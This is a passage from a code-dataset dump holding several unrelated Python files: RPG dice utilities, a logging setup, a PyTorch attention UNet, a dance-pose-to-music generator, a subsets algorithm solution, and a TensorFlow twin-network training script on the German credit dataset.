score):\n if game == \"dnd\":\n return dnd.get(score)\n if game == \"path\":\n return path.get(score)\n if game == \"fourth\":\n return fourth.get(score)\n\ndef ability_scores(method, n=1):\n \"\"\"'2d6', '3d6' or '4d6', n sets of 6\n\n use method to generate n sorted sets of ability scores\"\"\"\n set_of_scores = []\n for i in range(n):\n ability_scores = []\n for i in range(6):\n ability_scores.append(dice.roll_ability(method))\n ability_scores.sort()\n #return ability_scores\n set_of_scores.append(ability_scores)\n## if n == 1:\n## set_of_scores = set_of_scores[0]\n return set_of_scores\n\ndef total_points(scores, game):\n \"\"\"list of 6 ability scores followed by 'dnd', 'path', or 'fourth'\n\n given a set of scores, and the game, generate a dict with the points\n and scores\"\"\"\n pt_buy = []\n for lists in scores:\n for score in lists:\n pt_buy.append(points(game,score))\n if game == 'fourth':\n pt_buy[0] = fourth_8.get(lists[0])\n## if game == \"fourth\":\n## temp = fourth_8.get(score[0])\n## pt_buy[0] = temp\n return {'scores':scores, 'points':sum(pt_buy)}\n\n","sub_path":"rpg/modifiers.py","file_name":"modifiers.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"533870554","text":"''' Analytics Engine '''\n\nimport os\nimport json\nimport logging\nimport logging.config\nimport time\n\nlogging.Formatter.converter = time.gmtime\n\n\ndef setup_logging(\n default_path='logging.json',\n default_level=logging.INFO,\n env_key='LOG_CFG'\n):\n \"\"\"Setup logging configuration\"\"\"\n path = default_path\n value = os.getenv(env_key, None)\n if value:\n path = value\n if os.path.exists(path):\n with open(path, 'rt') as f:\n config = json.load(f)\n logging.config.dictConfig(config)\n else:\n logging.basicConfig(level=default_level)\n path = \"None\"\n logger = logging.getLogger(__name__)\n logger.info('Logging initialized using config: ' + path)\n\nsetup_logging()\n","sub_path":"cycles/cyclometer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"596164102","text":"import torch\nfrom torch import nn\nfrom torchvision.transforms import transforms\n\nclass DoubleConv(nn.Module):\n # The convolutional layer\n def __init__(self, in_ch, mid_ch, out_ch):\n super(DoubleConv, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_ch, mid_ch, 3, padding=1),\n nn.BatchNorm2d(mid_ch),\n nn.ReLU(inplace=True),\n nn.Conv2d(mid_ch, out_ch, 3, padding=1),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, input):\n return self.conv(input)\n\nclass DoubleConvRes(nn.Module):\n # The convolutional layer\n def __init__(self, in_ch, mid_ch, out_ch):\n super(DoubleConvRes, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_ch, out_ch, 3, padding=1),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True)\n )\n \n self.conv2 = nn.Conv2d(out_ch, out_ch, 3, padding=1)\n self.bn1 = nn.BatchNorm2d(out_ch)\n self.relu = nn.ReLU(inplace=True)\n self.conv3 = nn.Conv2d(out_ch, out_ch, 3, padding=1)\n self.bn2 = nn.BatchNorm2d(out_ch) \n\n def forward(self, input):\n out = self.conv1(input)\n residual = out\n out = self.conv2(out)\n out = self.bn1(out)\n out = self.relu(out)\n out = self.conv3(out)\n out = self.bn2(out)\n \n out += residual\n out = self.relu(out)\n \n return out\n\n\nclass OutConv(nn.Module):\n def __init__(self, in_ch, mid_ch, out_ch = 1):\n super(OutConv, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_ch, mid_ch, 3, padding=1),\n nn.BatchNorm2d(mid_ch),\n nn.ReLU(inplace=True),\n nn.Conv2d(in_ch, mid_ch, 3, padding=1),\n nn.BatchNorm2d(mid_ch),\n nn.ReLU(inplace=True),\n nn.Conv2d(mid_ch, out_ch, kernel_size=1)\n )\n\n def forward(self, input):\n return self.conv(input)\n\nclass Weighted_block(nn.Module):\n # Weighted Block (Also can be consider as a Attention block)\n def __init__(self, ch):\n super(Weighted_block, self).__init__() \n self.channel_attention = nn.Sequential( \n nn.Conv2d(ch, ch, 1),\n # nn.BatchNorm2d(ch),\n nn.ReLU(inplace=True),\n nn.Conv2d(ch, ch, 1),\n # nn.BatchNorm2d(ch),\n nn.Sigmoid()\n )\n\n def forward(self, input): \n attention = torch.nn.functional.adaptive_avg_pool2d(input, (1,1))\n attention = self.channel_attention(attention)\n output = input * attention\n\n return output\n\nclass CA_UNET(nn.Module):\n \n def __init__(self, in_ch=3, out_ch=1):\n super(CA_UNET, self).__init__()\n n1 = 64\n filters = [n1, n1 * 2, n1 * 4, n1 * 8, n1 * 16]\n\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n\n self.conv0_0 = DoubleConvRes(in_ch, filters[0], filters[0]) \n self.conv1_0 = DoubleConvRes(filters[0], filters[1], filters[1])\n self.up1_0 = nn.ConvTranspose2d(filters[1], filters[0], 2, stride=2)\n self.conv2_0 = DoubleConvRes(filters[1], filters[2], filters[2])\n self.up2_0 = nn.ConvTranspose2d(filters[2], filters[1], 2, stride=2)\n self.conv3_0 = DoubleConvRes(filters[2], filters[3], filters[3])\n self.up3_0 = nn.ConvTranspose2d(filters[3], filters[2], 2, stride=2)\n self.conv4_0 = DoubleConvRes(filters[3], filters[4], filters[4])\n self.up4_0 = nn.ConvTranspose2d(filters[4], filters[3], 2, stride=2)\n \n self.conv0_1 = DoubleConvRes(filters[0]*2, filters[0], filters[0]) \n self.conv1_1 = DoubleConvRes(filters[1]*2 + filters[0], filters[1], filters[1])\n self.up1_1 = nn.ConvTranspose2d(filters[1], filters[0], 2, stride=2)\n self.conv2_1 = DoubleConvRes(filters[2]*2 + filters[1], filters[2], filters[2])\n self.up2_1 = nn.ConvTranspose2d(filters[2], filters[1], 2, stride=2)\n self.conv3_1 = DoubleConvRes(filters[3]*2 + filters[2], filters[3], filters[3])\n self.up3_1 = nn.ConvTranspose2d(filters[3], filters[2], 2, stride=2)\n\n self.conv0_2 = DoubleConvRes(filters[0]*2, filters[0], filters[0])\n self.conv1_2 = DoubleConvRes(filters[1]*2 + filters[0], filters[1], filters[1])\n self.up1_2 = nn.ConvTranspose2d(filters[1], filters[0], 2, stride=2)\n self.conv2_2 = DoubleConvRes(filters[2]*2 + filters[1], filters[2], filters[2])\n self.up2_2 = nn.ConvTranspose2d(filters[2], filters[1], 2, stride=2)\n\n self.conv0_3 = DoubleConvRes(filters[0]*2, filters[0], filters[0])\n self.conv1_3 = DoubleConvRes(filters[1]*2 + filters[0], filters[1], filters[1])\n self.up1_3 = nn.ConvTranspose2d(filters[1], filters[0], 2, stride=2)\n\n self.conv0_4 = DoubleConvRes(filters[0]*2, filters[0], filters[0])\n \n self.WB3 = Weighted_block(filters[3])\n self.Eup3 = nn.ConvTranspose2d(filters[3], filters[2], 2, stride=2)\n self.WB2 = Weighted_block(filters[2])\n self.Eup2 = nn.ConvTranspose2d(filters[2], filters[1], 2, stride=2)\n self.WB1 = Weighted_block(filters[1])\n self.Eup1 = nn.ConvTranspose2d(filters[1], filters[0], 2, stride=2) \n \n self.final = nn.Conv2d(filters[0], out_ch, 1)\n\n def forward(self, x):\n \n x0_0 = self.conv0_0(x)\n x1_0 = self.conv1_0(self.pool(x0_0))\n x2_0 = self.conv2_0(self.pool(x1_0))\n x3_0 = self.conv3_0(self.pool(x2_0))\n x4_0 = self.conv4_0(self.pool(x3_0))\n \n x0_1 = self.conv0_1(torch.cat([x0_0, self.up1_0(x1_0)], 1)) \n x1_1 = self.conv1_1(torch.cat([self.pool(x0_1), x1_0, self.up2_0(x2_0)], 1))\n x2_1 = self.conv2_1(torch.cat([self.pool(x1_1), x2_0, self.up3_0(x3_0)], 1))\n x3_1 = self.conv3_1(torch.cat([self.pool(x2_1), x3_0, self.up4_0(x4_0)], 1))\n \n x0_2 = self.conv0_2(torch.cat([x0_1, self.up1_1(x1_1)], 1))\n x1_2 = self.conv1_2(torch.cat([self.pool(x0_2), x1_1, self.up2_1(x2_1)], 1))\n x2_2 = self.conv2_2(torch.cat([self.pool(x1_2), x2_1, self.up3_1(x3_1)], 1))\n \n x0_3 = self.conv0_3(torch.cat([x0_2, self.up1_2(x1_2)], 1))\n x1_3 = self.conv1_3(torch.cat([self.pool(x0_3), x1_2, self.up2_2(x2_2)], 1))\n\n x0_4 = self.conv0_4(torch.cat([x0_3, self.up1_3(x1_3)], 1))\n \n WB3 = self.WB3(x3_1)\n Eup3 = self.Eup3(WB3)\n WB2 = self.WB2(x2_2) + Eup3\n Eup2 = self.Eup2(WB2)\n WB1 = self.WB1(x1_3) + Eup2\n Eup1 = self.Eup1(WB1)\n WB0 = Eup1 + x0_4\n \n output = self.final(WB0)\n\n return output","sub_path":"ca.py","file_name":"ca.py","file_ext":"py","file_size_in_byte":6713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"641239023","text":"import json\nfrom pydub import AudioSegment\nimport random\nimport os\nimport simpleaudio\n\ndef main(data):\n #Get all positions from dance into an array\n positions = getPositions(data)\n\n #Get all timestamps of positions into an array\n timestamps = getTimestamps(data)\n\n #Decide on a background drum loop, and get the AduioSegment of it\n backgroundDrumLoop = setDrums(timestamps[-1], len(positions))\n\n #Make the drum loop play for as long as the submitted video is in length\n backgroundDrumLoopCorrected = correctDrumLoop(backgroundDrumLoop, timestamps[-1])\n\n #Get an array of AudioSegment objects corresponding to the positions\n positionAudioSegments = getPosAudioSegements(positions)\n\n #Add the AudioSegments of the positions to the background drums at their respective timestamps\n finalSong = addPosSoundToDrums(backgroundDrumLoopCorrected, positionAudioSegments, timestamps)\n\n curDir = os.getcwd()\n newCurDir = curDir.replace(os.sep, '/')\n finalSong.export(newCurDir + \"/sounds/final-song/final.wav\", format=\"wav\")\n\n\n\n\ndef getPositions(data):\n \"\"\"\n Get the positions that were determined by the neural network model\n :param data: JSON Object\n :return: Array of dance positions\n \"\"\"\n positions = data['pos']\n return positions\n\n\ndef getTimestamps(data):\n \"\"\"\n Get the time stamps for each position\n :param data: JSON Object\n :return: Array of timestamps\n \"\"\"\n timestamps = data['time']\n return timestamps\n\n\ndef setDrums(endOfVideoTime, numPositions):\n \"\"\"\n Choose which background drum loop to play based on how long the dance was\n and how many moves were made\n :param endOfVideoTime: The time in ms for how long dance was\n :param numPositions: The number of dance positions the user made\n :return: Which drum loop should be played\n \"\"\"\n speedOfDance = numPositions / (endOfVideoTime / 1000)\n curDir = os.getcwd()\n newCurDir = curDir.replace(os.sep, '/')\n\n\n if speedOfDance >= 2:\n drums = newCurDir + '/sounds/drum-loops/slow-paced-drumloop.wav'\n elif speedOfDance < 2 and speedOfDance >= 1:\n randint = random.randint(1,3)\n\n if randint == 1:\n drums = newCurDir + '/sounds/drum-loops/medium-paced-scifi-drumloop.wav'\n elif randint == 2:\n drums = newCurDir + '/sounds/drum-loops/medium-paced-drumloop.wav'\n else:\n drums = newCurDir + '/sounds/drum-loops/med-fast-paced-drumloop.wav'\n elif speedOfDance < 1:\n drums = newCurDir + '/sounds/drum-loops/fast-paced-drumloop.wav'\n\n backgroundDrums = AudioSegment.from_file(drums)\n\n return backgroundDrums\n\n\ndef correctDrumLoop(drumLoop, timeOfDance):\n \"\"\"\n makes the background drum loop for the entirety of the dance\n :param drumLoop: an AudioSegment of the selected background drum loop\n :return: an AduioSegment of the selected background drum loop, corrected in its time lenght\n \"\"\"\n timeOfDanceSeconds = timeOfDance / 1000\n timeOfDrumLoop = drumLoop.duration_seconds\n curTime = 0\n numRepeat = 1\n\n if timeOfDanceSeconds > timeOfDrumLoop:\n while curTime < timeOfDanceSeconds:\n curTime += timeOfDrumLoop\n numRepeat += 1\n\n\n drumLoopCorrected = drumLoop * numRepeat\n\n return drumLoopCorrected\n\n\n\ndef getPosAudioSegements(positions):\n \"\"\"\n Given an array of positions, create an array of audio segments matching the positions\n :param positions: array of dance positions\n :return: array of AudioSegmants corresponding to the positions\n \"\"\"\n\n positionList = []\n\n curDir = os.getcwd()\n newCurDir = curDir.replace(os.sep, '/')\n\n fortfive_left_path = newCurDir + '/sounds/position-sounds/45-left.wav'\n fortyfive_right_path = newCurDir + '/sounds/position-sounds/45-right.wav'\n a_pose_path = newCurDir + '/sounds/position-sounds/a-pose.wav'\n backward_c_path = newCurDir + '/sounds/position-sounds/backward-c.wav'\n c_pose_path = newCurDir + '/sounds/position-sounds/c-pose.wav'\n double_down_pump_path = newCurDir + '/sounds/position-sounds/double-down-pump.wav'\n double_fist_pump_up_path = newCurDir + '/sounds/position-sounds/double-fist-pump-up.wav'\n double_up_pump_path = newCurDir + '/sounds/position-sounds/double-up-pump.wav'\n down_circle_path = newCurDir + '/sounds/position-sounds/down-circle.wav'\n left_fist_pump_path = newCurDir + '/sounds/position-sounds/left-fist-pump.wav'\n left_fist_pump_up_path = newCurDir + '/sounds/position-sounds/left-fist-pump-up.wav'\n left_lean_path = newCurDir + '/sounds/position-sounds/left-lean.wav'\n left_up_right_down_path = newCurDir + '/sounds/position-sounds/left-up-right-down.wav'\n m_pose_path = newCurDir + '/sounds/position-sounds/m-pose.wav'\n no_pose_path = newCurDir + '/sounds/position-sounds/no-pose.wav'\n right_fist_pump_path = newCurDir + '/sounds/position-sounds/right-fist-pump.wav'\n right_fist_pump_up_path = newCurDir + '/sounds/position-sounds/right-fist-pump-up.wav'\n right_lean_path = newCurDir + '/sounds/position-sounds/right-lean.wav'\n right_up_left_down_path = newCurDir + '/sounds/position-sounds/right-up-left-down.wav'\n t_pose_path = newCurDir + '/sounds/position-sounds/t-pose.wav'\n upside_down_y_pose_path = newCurDir + '/sounds/position-sounds/upside-down-y-pose.wav'\n y_pose_path = newCurDir + '/sounds/position-sounds/y-pose.wav'\n\n fortfive_left = AudioSegment.from_file(fortfive_left_path)\n fortyfive_right = AudioSegment.from_file(fortyfive_right_path)\n a_pose = AudioSegment.from_file(a_pose_path)\n backward_c = AudioSegment.from_file(backward_c_path)\n c_pose = AudioSegment.from_file(c_pose_path)\n double_down_pump = AudioSegment.from_file(double_down_pump_path)\n double_fist_pump_up = AudioSegment.from_file(double_fist_pump_up_path)\n double_up_pump = AudioSegment.from_file(double_up_pump_path)\n down_circle = AudioSegment.from_file(down_circle_path)\n left_fist_pump = AudioSegment.from_file(left_fist_pump_path)\n left_fist_pump_up = AudioSegment.from_file(left_fist_pump_up_path)\n left_lean = AudioSegment.from_file(left_lean_path)\n left_up_right_down = AudioSegment.from_file(left_up_right_down_path)\n m_pose = AudioSegment.from_file(m_pose_path)\n no_pose = AudioSegment.from_file(no_pose_path)\n right_fist_pump = AudioSegment.from_file(right_fist_pump_path)\n right_fist_pump_up = AudioSegment.from_file(right_fist_pump_up_path)\n right_lean = AudioSegment.from_file(right_lean_path)\n right_up_left_down = AudioSegment.from_file(right_up_left_down_path)\n t_pose = AudioSegment.from_file(t_pose_path)\n upside_down_y_pose = AudioSegment.from_file(upside_down_y_pose_path)\n y_pose = AudioSegment.from_file(y_pose_path)\n\n for pos in range(len(positions)):\n curPos = positions[pos]\n\n if curPos == 'Y pose':\n positionList.append(y_pose)\n elif curPos == 'M pose':\n positionList.append(m_pose)\n elif curPos == 'C pose':\n positionList.append(c_pose)\n elif curPos == 'A pose':\n positionList.append(a_pose)\n elif curPos == 'T pose':\n positionList.append(t_pose)\n elif curPos == '45 Right Pose':\n positionList.append(fortyfive_right)\n elif curPos == '45 left Pose':\n positionList.append(fortfive_left)\n elif curPos == 'no Pose':\n positionList.append(no_pose)\n elif curPos == 'Right fist pump':\n positionList.append(right_fist_pump)\n elif curPos == 'Left fist pump':\n positionList.append(left_fist_pump)\n elif curPos == 'Double pump up':\n positionList.append(double_up_pump)\n elif curPos == 'Double pump down':\n positionList.append(double_down_pump)\n elif curPos == 'Right up left down':\n positionList.append(right_up_left_down)\n elif curPos == 'Left up right down':\n positionList.append(left_up_right_down)\n elif curPos == 'Down Y':\n positionList.append(upside_down_y_pose)\n elif curPos == 'Right fist up':\n positionList.append(right_fist_pump_up)\n elif curPos == 'left fist up':\n positionList.append(left_fist_pump_up)\n elif curPos == 'double fist up':\n positionList.append(double_fist_pump_up)\n elif curPos == 'right lean':\n positionList.append(right_lean)\n elif curPos == 'left lean':\n positionList.append(left_lean)\n elif curPos == 'down circle':\n positionList.append(down_circle)\n elif curPos == 'backwards c':\n positionList.append(backward_c)\n\n return positionList\n\n\ndef addPosSoundToDrums(backgroundDrumLoopCorrected, positionAudioSegments, timestamps):\n \"\"\"\n This function will produce the final song for the dance. It will add the AdioSegments of each position\n on top of the drum loop at each specified timestamp\n :param backgroundDrumLoopCorrected: The background drum music\n :param positionAudioSegments: An array of AudioSegments for each position\n :param timestamps: An array of timestamps for each position\n :return: An audiosegmant of the final song\n \"\"\"\n\n for sound in range(len(positionAudioSegments)):\n backgroundDrumLoopCorrected = backgroundDrumLoopCorrected.overlay(positionAudioSegments[sound], position=timestamps[sound])\n return backgroundDrumLoopCorrected\n\n","sub_path":"backend/functions/makeMusic.py","file_name":"makeMusic.py","file_ext":"py","file_size_in_byte":9459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"615483461","text":"#coding:utf-8\n\n\"\"\"\n18. Subsets II\nDescription\n\nGiven a collection of integers that might contain duplicates, nums, return all possible subsets (the power set).\n\n Each element in a subset must be in non-descending order.\n The ordering between two subsets is free.\n The solution set must not contain duplicate subsets.\n\nExample 1:\n\n\tInput: [0]\n\tOutput:\n\t[\n\t [],\n\t [0]\n\t]\n\nExample 2:\n\n\tInput: [1,2,2]\n\tOutput:\n\t[\n\t [2],\n\t [1],\n\t [1,2,2],\n\t [2,2],\n\t [1,2],\n\t []\n\t]\n\nChallenge\n\nCan you do it in both recursively and iteratively?\n\n\"\"\"\nclass Solution:\n \"\"\"\n @param nums: A set of numbers.\n @return: A list of lists. All valid subsets.\n \"\"\"\n def subsetsWithDup(self, nums):\n # write your code here\n size=len(nums)\n if size==0:\n return [[]]\n nums.sort()\n ret=[]\n self.dfs(nums,0,size,ret)\n return ret\n \n def dfs(self,nums,begin,size,ret,temp=[]):\n if temp not in ret:\n ret.append(temp[:])\n if begin==size:\n return \n for i in range(begin,size):\n temp.append(nums[i])\n self.dfs(nums,i+1,size,ret,temp)\n temp.pop()\n\n","sub_path":"lintcode刷题/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"586924618","text":"import sys\n\nsys.path.append(\"..\")\nsys.path.append(\"../..\")\n\nimport numpy as np\nimport os\nimport argparse\nfrom sklearn.metrics import accuracy_score\nimport tensorflow as tf\nfrom dataloader import GermanCreditDataset, get_subportion_confounders\nfrom german_metadata import decre_monoto\nfrom model_twins import Twin_Net_with_Z_A, dice_loss,Twin_Net,multi_class_twin_za\nfrom sklearn.preprocessing import MinMaxScaler\nfrom utils import read_pickle_object,pickle_object\nimport sklearn\nfrom sklearn.metrics import f1_score\nfrom sklearn.utils import resample\n\n\ndef run_train(args):\n\n dataset = GermanCreditDataset(**vars(args))\n\n try:\n dataset.train.drop(['propensity_score','Unnamed: 0'], axis=1, inplace=True)\n dataset.test.drop(['propensity_score','Unnamed: 0'], axis=1, inplace=True)\n except:\n print('Not Propensity matched')\n\n\n if args.oversample:\n raise NotImplementedError\n # y = dataset.train[args.outcome]\n #\n # dataset_proc = dataset.train.drop([args.outcome], axis=1, inplace=False)\n #\n # smote = SMOTE()\n #\n # x_sm, y_sm = smote.fit_resample(dataset_proc, y)\n # x_sm.insert(0,args.outcome,y_sm)\n # scaler = MinMaxScaler()\n # x_sm['{}_prime'.format(args.outcome)] = scaler.fit_transform(x_sm['{}_prime'.format(args.outcome)].values[...,np.newaxis])\n # x_sm['{}_prime'.format(args.outcome)].loc[x_sm['{}_prime'.format(args.outcome)]>=0.5] = 1\n # x_sm['{}_prime'.format(args.outcome)].loc[x_sm['{}_prime'.format(args.outcome)]<0.5] = 0\n # y_2 = x_sm['{}_prime'.format(args.outcome)]\n # x_sm.drop(['{}_prime'.format(args.outcome)], axis=1, inplace=True)\n # x_sm_2, y_sm_2 = smote.fit_resample(x_sm, y_2)\n # x_sm_2.insert(0,'{}_prime'.format(args.outcome),y_sm_2)\n # x_sm_2[args.outcome].loc[x_sm_2[args.outcome] >= 0.5] = 1\n # x_sm_2[args.outcome].loc[x_sm_2[args.outcome] < 0.5] = 0\n # x_sm_2['X'].loc[x_sm_2['X'] >= 0.5] = 1\n # x_sm_2['X'].loc[x_sm_2['X'] < 0.5] = 0\n # x_sm_2['X_prime'].loc[x_sm_2['X_prime'] >= 0.5] = 1\n # x_sm_2['X_prime'].loc[x_sm_2['X_prime'] < 0.5] = 0\n # dataset.train = x_sm_2\n #\n # y = dataset.test[args.outcome]\n #\n # dataset_proc = dataset.test.drop([args.outcome], axis=1, inplace=False)\n #\n #\n #\n # x_sm, y_sm = smote.fit_resample(dataset_proc, y)\n # x_sm.insert(0, 'Y', y_sm)\n # scaler = MinMaxScaler()\n # x_sm['Y_prime'] = scaler.fit_transform(x_sm['Y_prime'].values[..., np.newaxis])\n # x_sm['Y_prime'].loc[x_sm['Y_prime'] >= 0.5] = 1\n # x_sm['Y_prime'].loc[x_sm['Y_prime'] < 0.5] = 0\n # y_2 = x_sm['Y_prime']\n # x_sm.drop(['Y_prime'], axis=1, inplace=True)\n # x_sm_2, y_sm_2 = smote.fit_resample(x_sm, y_2)\n # x_sm_2.insert(0, 'Y_prime', y_sm_2)\n # x_sm_2['Y'].loc[x_sm_2['Y'] >= 0.5] = 1\n # x_sm_2['Y'].loc[x_sm_2['Y'] < 0.5] = 0\n # x_sm_2['X'].loc[x_sm_2['X'] >= 0.5] = 1\n # x_sm_2['X'].loc[x_sm_2['X'] < 0.5] = 0\n # x_sm_2['X_prime'].loc[x_sm_2['X_prime'] >= 0.5] = 1\n # x_sm_2['X_prime'].loc[x_sm_2['X_prime'] < 0.5] = 0\n # dataset.test = x_sm_2\n\n elif args.undersample:\n raise NotImplementedError\n # neg_ = dataset.train[(dataset.train['Y'] == 0) | (dataset.train['Y_prime'] == 0)]\n # pos_ = dataset.train[(dataset.train['Y'] == 1) | (dataset.train['Y_prime'] == 1)]\n # ids = len(neg_)\n # choices = np.random.choice(ids, len(pos_))\n # res_neg_features = neg_.iloc[choices]\n # dataset.train = pd.concat([res_neg_features, pos_], axis=0)\n\n target = dataset.train.pop(args.outcome)\n args.target_max = target.values.max()\n args.target_min = target.values.min()\n target_prime = dataset.train.pop('{}_prime'.format(args.outcome))\n\n\n treatment = dataset.train.pop(args.treatment)\n treatment_prime = dataset.train.pop('{}_prime'.format(args.treatment))\n uy = dataset.train.pop('Uy')\n\n dataset.test = dataset.test.reset_index().drop(['index'],axis=1)\n\n target_test = dataset.test.pop('{}'.format(args.outcome))\n target_prime_test = dataset.test.pop('{}_prime'.format(args.outcome))\n treatment_test = dataset.test.pop('{}'.format(args.treatment))\n treatment_prime_test = dataset.test.pop('{}_prime'.format(args.treatment))\n uy_test = dataset.test.pop('Uy')\n\n if 'multi_azlink' == args.architecture:\n nb_classes = args.target_max + 1\n target = np.eye(nb_classes.astype(int))[target.astype(int)]\n target_prime = np.eye(nb_classes.astype(int))[target_prime.astype(int)]\n target_test = np.eye(nb_classes.astype(int))[target_test.astype(int)]\n target_prime_test = np.eye(nb_classes.astype(int))[target_prime_test.astype(int)]\n\n if args.cat_treat:\n treatment = treatment.astype(int)\n treatment_prime = treatment_prime.astype(int)\n treatment_test = treatment_test.astype(int)\n treatment_prime_test = treatment_prime_test.astype(int)\n\n # Get confounders\n\n dataset.train = get_subportion_confounders(dataset.train, args.confounders)\n dataset.test = get_subportion_confounders(dataset.test, args.confounders)\n\n args.len_conf = len(dataset.train.columns)\n\n # using multiple inputs or all confounders together ?\n if args.multiple_confounders:\n args.z_monotonicity = []\n input_len = args.len_conf + 2\n\n args.z_monotonicity_latice = []\n for i, col in enumerate(dataset.train.columns):\n\n if col in decre_monoto and args.z_monotonicity_base!=0:\n args.z_monotonicity.append(0)\n else:\n args.z_monotonicity.append(args.z_monotonicity_base)\n\n\n args.lattice_sizes.append(args.z_calib_units)\n\n else:\n\n args.z_monotonicity = [args.z_monotonicity]\n args.lattice_sizes.append(args.len_conf)\n\n # Define Model\n\n if 'twin' == args.architecture:\n model = Twin_Net(treatment, uy, dataset.train, args)\n elif 'multi_azlink' == args.architecture:\n model = multi_class_twin_za(treatment, uy, dataset.train, args)\n else:\n model = Twin_Net_with_Z_A(treatment, uy, dataset.train, args)\n\n # Set up loss\n if 'mse' in args.loss:\n loss_func = tf.keras.losses.mean_squared_error\n elif 'mae' in args.loss:\n loss_func = tf.keras.losses.mean_absolute_error\n elif 'bce' in args.loss:\n loss_func = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n elif 'dice' in args.loss:\n loss_func = dice_loss\n elif 'hinge' in args.loss:\n loss_func = tf.keras.losses.hinge\n\n\n # Save Hparams\n pickle_object(vars(args), os.path.join(args.runPath, 'hparams.pkl'))\n if args.lr_schedule:\n lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n args.lr,\n decay_steps=len(dataset.train)*10,\n decay_rate=0.96,\n staircase=True)\n\n optimizer = tf.keras.optimizers.Adagrad(learning_rate=lr_schedule)\n else:\n optimizer = tf.keras.optimizers.Adam(learning_rate=args.lr)\n\n if args.weighted_loss:\n model.compile(\n loss=[loss_func,loss_func],\n loss_weights = [args.weight_1, args.weight_2],\n optimizer=optimizer)\n else:\n model.compile(\n loss=loss_func,\n optimizer=optimizer)\n\n cp_callback_best = tf.keras.callbacks.ModelCheckpoint(\n filepath=args.runPath + '/best',\n verbose=1,\n save_weights_only=True,\n save_best_only=True,\n monitor='val_loss')\n cp_callback_latest = tf.keras.callbacks.ModelCheckpoint(\n filepath=args.runPath + '/latest',\n verbose=0,\n save_weights_only=True,\n save_best_only=False,\n save_freq=100 * args.batch_size)\n\n if args.train:\n print('-------------------------Experiment: {} ---------------------'.format(args.name))\n conf_to_input = [dataset.train.values.astype(np.float32)]\n conf_to_input_test = [dataset.test.values.astype(np.float32)]\n\n if args.multiple_confounders:\n conf_to_input = [dataset.train[i].values.astype(np.float32) for i in dataset.train.columns]\n conf_to_input_test = [dataset.test[i].values.astype(np.float32) for i in dataset.test.columns]\n\n if args.architecture != 'multi_azlink':\n target = [target.values[..., np.newaxis]]\n target_prime = [target_prime.values[..., np.newaxis]]\n target_test = [target_test.values[..., np.newaxis]]\n target_prime_test = [target_prime_test.values[..., np.newaxis]]\n else:\n target = [target[:,i][...,np.newaxis] for i in range(target.shape[-1])]\n target_prime = [target_prime[:,i][...,np.newaxis] for i in range(target_prime.shape[-1])]\n target_test = [target_test[:, i][..., np.newaxis] for i in range(target_test.shape[-1])]\n target_prime_test = [target_prime_test[:, i][..., np.newaxis] for i in range(target_prime_test.shape[-1])]\n\n model.fit(\n [treatment.values.astype(np.float32), treatment_prime.values.astype(np.float32),\n uy.values.astype(np.float32), conf_to_input],\n [*target,*target_prime],\n batch_size=args.batch_size,\n epochs=args.epochs,\n validation_split=0.2,\n shuffle=True,\n\n callbacks=[cp_callback_best, cp_callback_latest],\n verbose=1)\n print('-------------------------Experiment: {} ---------------------'.format(args.name))\n\n\n model.load_weights(args.runPath + '/best')\n # model.save(args.runPath + '/best_model.tf')\n\n conf_to_input = [dataset.test.values.astype(np.float32)]\n if args.multiple_confounders:\n conf_to_input = [dataset.test[i].values.astype(np.float32) for i in dataset.test.columns]\n test_loss = model.evaluate([treatment_test.values.astype(np.float32),treatment_prime_test.values.astype(np.float32),\n uy_test.values.astype(np.float32),\n conf_to_input],\n [*target_test, *target_prime_test],)\n print('Test Loss : {}'.format(test_loss))\n preds = model.predict([treatment_test.values.astype(np.float32),treatment_prime_test.values.astype(np.float32),\n uy_test.values.astype(np.float32), conf_to_input],\n args.batch_size, 1)\n\n title = ['Factual', 'Counterfactual']\n if args.architecture != 'multi_azlink':\n preds = preds[0:2]\n target_prime_test = target_prime_test[0]\n target_test = target_test[0]\n else:\n preds = [np.hstack(preds[0:3]), np.hstack(preds[3:])]\n target_prime_test = np.hstack(target_prime_test)\n target_test = np.hstack(target_test)\n for i, pred in enumerate(preds):\n if title[i] == 'Counterfactual':\n gt = target_prime_test\n else:\n gt = target_test\n\n if 'Y' not in args.outcome or args.architecture == 'multi_azlink':\n scaler = MinMaxScaler()\n pred = scaler.fit_transform(pred)\n pred[pred >= 0.5] = 1\n pred[pred < 0.5] = 0\n else:\n pred = np.digitize(pred, [args.target_min, (args.target_max - args.target_min) / 4,\n (args.target_max - args.target_min) * 3 / 4]) - 1\n\n ac = accuracy_score(pred, gt)\n print('{} Acc: {}'.format(title[i], ac))\n if len(np.unique(gt.values)) > 2:\n f1 = f1_score(gt.values, pred, average='macro')\n else:\n f1 = f1_score(gt.values, pred, )\n print('{} F1 : {}'.format(title[i], f1))\n # auc_r = roc_auc_score(gt.values, pred)\n # print('{} AUC-ROC : {}'.format(title[i], auc_r))\n\n\n\n # inference_wrapper(args, treatment_test, dataset, model)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--train', type=bool, default=True)\n parser.add_argument('--inference_name',\n default='')\n # Logging\n parser.add_argument('--restore', type=bool, default=False)\n # parser.add_argument('--log_root', type=str, default='./experiments/German_Credit_treat_{}_outcome_{}_2_neighb_{}/')\n # parser.add_argument('--log_root', type=str, default='./experiments/German_Credit_treat_{}_2_outcome_{}_neighb_{}/')\n parser.add_argument('--log_root', type=str, 